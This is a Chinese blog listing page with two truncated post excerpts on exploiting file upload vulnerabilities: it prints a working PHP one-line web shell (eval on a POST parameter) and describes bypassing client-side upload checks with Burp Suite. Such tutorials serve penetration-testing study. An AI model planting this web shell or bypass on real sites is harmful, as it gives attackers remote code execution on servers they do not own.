网络渗透
锦~鹏
这个作者很懒,什么都没留下…
展开
-
文件上传漏洞利用与利用
文件上传漏洞 可以上传一句话木马 PHP一句话木马如下 木马的连接密码是value <?php @eval($_POST[value]);?> 我们看到这个地方有一个上传点 然后我们上传一个php的脚本看能不能上传成功 然后我们看到没有上传成功被拦截了 看一下源代码是什么 function checkFile() { var file = document.getE...原创 2019-08-01 15:07:11 · 1255 阅读 · 0 评论 -
1
先找在目标找一个上传点 看有没有上传类型的限制如果有就想办法绕过 部分绕过方法访问下面的网址https://blog.csdn.net/weixin_45178890/article/details/98056027 先分析这个上传点是什么上传验证 可以看到用burpsuite1.6pro抓包发现是一个本地上传验证 因为没有抓到数据包就被拦截下来了绕过方法看上面我发的链接就行了 先将小...原创 2019-08-02 00:54:30 · 1829 阅读 · 2 评论